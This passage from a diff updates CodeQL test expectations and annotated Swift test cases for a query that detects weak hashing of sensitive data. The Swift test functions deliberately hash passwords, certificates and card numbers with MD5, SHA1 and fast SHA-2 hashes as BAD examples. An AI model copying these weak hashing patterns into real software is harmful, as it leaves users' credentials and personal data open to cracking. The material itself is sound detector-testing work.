account_no) | +| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | +| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | edges | testCryptoKit.swift:230:18:230:38 | call to Data.init(_:) | testCryptoKit.swift:231:44:231:44 | value1 | provenance | | | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:230:23:230:34 | .utf8 | provenance | | @@ -75,40 +112,3 @@ nodes | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | semmle.label | creditCardNumber | | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | semmle.label | creditCardNumber | subpaths -#select -| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | -| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref index 85270fde2999..d76eeef6c2f2 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref @@ -1 +1,2 @@ -queries/Security/CWE-328/WeakSensitiveDataHashing.ql +query: queries/Security/CWE-328/WeakSensitiveDataHashing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift b/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift index 6869805e65aa..c705584d2d48 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift +++ b/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift @@ -81,43 +81,43 @@ enum Insecure { // --- tests --- func testHashMethods(passwd : UnsafeRawBufferPointer, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { - var hash = Crypto.Insecure.MD5.hash(data: passwd) // BAD - hash = Crypto.Insecure.MD5.hash(bufferPointer: passwd) // BAD - hash = Crypto.Insecure.MD5.hash(data: cert) // BAD + var hash = Crypto.Insecure.MD5.hash(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.MD5.hash(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.MD5.hash(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash = Crypto.Insecure.MD5.hash(data: encrypted_passwd) // GOOD (not sensitive) - hash = Crypto.Insecure.MD5.hash(data: account_no) // BAD - hash = Crypto.Insecure.MD5.hash(data: credit_card_no) // BAD + hash = Crypto.Insecure.MD5.hash(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash = Crypto.Insecure.MD5.hash(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] - hash = Insecure.MD5.hash(data: passwd) // BAD - hash = Insecure.MD5.hash(bufferPointer: passwd) // BAD - hash = Insecure.MD5.hash(data: cert) // BAD + hash = Insecure.MD5.hash(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Insecure.MD5.hash(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Insecure.MD5.hash(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash = Insecure.MD5.hash(data: encrypted_passwd) // GOOD (not sensitive) - hash = Insecure.MD5.hash(data: account_no) // BAD - hash = Insecure.MD5.hash(data: credit_card_no) // BAD + hash = Insecure.MD5.hash(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash = Insecure.MD5.hash(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] - hash = Crypto.Insecure.SHA1.hash(data: passwd) // BAD - hash = Crypto.Insecure.SHA1.hash(bufferPointer: passwd) // BAD - hash = Crypto.Insecure.SHA1.hash(data: cert) // BAD + hash = Crypto.Insecure.SHA1.hash(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.SHA1.hash(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.SHA1.hash(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash = Crypto.Insecure.SHA1.hash(data: encrypted_passwd) // GOOD (not sensitive) - hash = Crypto.Insecure.SHA1.hash(data: account_no) // BAD - hash = Crypto.Insecure.SHA1.hash(data: credit_card_no) // BAD + hash = Crypto.Insecure.SHA1.hash(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash = Crypto.Insecure.SHA1.hash(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] - hash = Crypto.SHA256.hash(data: passwd) // BAD, not a computationally expensive hash - hash = Crypto.SHA256.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash = Crypto.SHA256.hash(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] + hash = Crypto.SHA256.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash = Crypto.SHA256.hash(data: cert) // GOOD, computationally expensive hash not required hash = Crypto.SHA256.hash(data: encrypted_passwd) // GOOD, not sensitive hash = Crypto.SHA256.hash(data: account_no) // GOOD, computationally expensive hash not required hash = Crypto.SHA256.hash(data: credit_card_no) // GOOD, computationally expensive hash not required - hash = Crypto.SHA384.hash(data: passwd) // BAD, not a computationally expensive hash - hash = Crypto.SHA384.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash = Crypto.SHA384.hash(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] + hash = Crypto.SHA384.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash = Crypto.SHA384.hash(data: cert) // GOOD, computationally expensive hash not required hash = Crypto.SHA384.hash(data: encrypted_passwd) // GOOD, not sensitive hash = Crypto.SHA384.hash(data: account_no) // GOOD, computationally expensive hash not required hash = Crypto.SHA384.hash(data: credit_card_no) // GOOD, computationally expensive hash not required - hash = Crypto.SHA512.hash(data: passwd) // BAD, not a computationally expensive hash - hash = Crypto.SHA512.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash = Crypto.SHA512.hash(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] + hash = Crypto.SHA512.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash = Crypto.SHA512.hash(data: cert) // GOOD, computationally expensive hash not required hash = Crypto.SHA512.hash(data: encrypted_passwd) // GOOD, not sensitive hash = Crypto.SHA512.hash(data: account_no) // GOOD, computationally expensive hash not required @@ -126,25 +126,25 @@ func testHashMethods(passwd : UnsafeRawBufferPointer, cert: String, encrypted_pa func testMD5UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.Insecure.MD5() - hash.update(data: passwd) // BAD - hash.update(data: cert) // BAD + hash.update(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(data: encrypted_passwd) // GOOD (not sensitive) - hash.update(data: account_no) // BAD - hash.update(data: credit_card_no) // BAD + hash.update(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA1UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.Insecure.SHA1() - hash.update(data: passwd) // BAD - hash.update(data: cert) // BAD + hash.update(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(data: encrypted_passwd) // GOOD (not sensitive) - hash.update(data: account_no) // BAD - hash.update(data: credit_card_no) // BAD + hash.update(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA256UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.SHA256() - hash.update(data: passwd) // BAD, not a computationally expensive hash + hash.update(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(data: cert) // GOOD hash.update(data: encrypted_passwd) // GOOD (not sensitive) hash.update(data: account_no) // GOOD @@ -153,7 +153,7 @@ func testSHA256UpdateWithData(passwd : String, cert: String, encrypted_passwd : func testSHA384UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.SHA384() - hash.update(data: passwd) // BAD, not a computationally expensive hash + hash.update(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(data: cert) // GOOD hash.update(data: encrypted_passwd) // GOOD (not sensitive) hash.update(data: account_no) // GOOD @@ -162,7 +162,7 @@ func testSHA384UpdateWithData(passwd : String, cert: String, encrypted_passwd : func testSHA512UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.SHA512() - hash.update(data: passwd) // BAD, not a computationally expensive hash + hash.update(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(data: cert) // GOOD hash.update(data: encrypted_passwd) // GOOD (not sensitive) hash.update(data: account_no) // GOOD @@ -171,25 +171,25 @@ func testSHA512UpdateWithData(passwd : String, cert: String, encrypted_passwd : func testMD5UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.Insecure.MD5() - hash.update(bufferPointer: passwd) // BAD - hash.update(bufferPointer: cert) // BAD + hash.update(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(bufferPointer: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) - hash.update(bufferPointer: account_no) // BAD - hash.update(bufferPointer: credit_card_no) // BAD + hash.update(bufferPointer: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(bufferPointer: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA1UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.Insecure.SHA1() - hash.update(bufferPointer: passwd) // BAD - hash.update(bufferPointer: cert) // BAD + hash.update(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(bufferPointer: cert) // BAD // $ 